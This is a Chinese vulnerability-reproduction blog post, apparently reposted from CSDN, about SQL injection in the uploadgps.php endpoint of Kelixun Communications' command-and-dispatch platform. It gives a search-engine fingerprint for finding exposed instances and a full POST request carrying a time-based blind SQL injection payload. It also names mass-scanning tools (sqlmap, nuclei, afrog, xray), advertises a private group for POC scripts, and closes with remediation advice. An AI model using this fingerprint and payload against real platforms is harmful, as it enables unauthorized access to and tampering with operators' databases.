当前位置：首页 > news >正文

【漏洞复现】科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入

news 文章来源：https://blog.csdn.net/m0_60571842/article/details/140069404 2025/4/3 18:20:18

0x01 产品简介

科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务，并即时获取现场反馈和报告。

0x02 漏洞概述

福建科立讯通信有限公司指挥调度管理平台uploadgps.php接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性，甚至获取对数据库的完全控制。

0x03 搜索引擎

body="指挥调度管理平台"

在这里插入图片描述

0x04 漏洞复现

POST /api/client/task/uploadgps.php HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 70uuid=&gps=1'+AND+(SELECT+7679+FROM+(SELECT(SLEEP(5)))ozYR)+AND+'fqDZ'='fqDZ&number=

在这里插入图片描述

sqlmap验证

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、使用参数化查询：使用参数化的 SQL 查询语句，而不是将用户输入直接拼接到 SQL 语句中。这可以防止恶意输入被误解为 SQL 代码。
2、输入验证和过滤：对用户输入的数据进行严格的验证和过滤，确保输入的数据符合预期格式和类型。
3、最小权限原则：确保数据库连接使用的账户具有最小必要的权限，避免使用具有过高权限的账户。

0x01 产品简介

0x02 漏洞概述

0x03 搜索引擎

0x04 漏洞复现

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

0x06 修复建议

相关文章：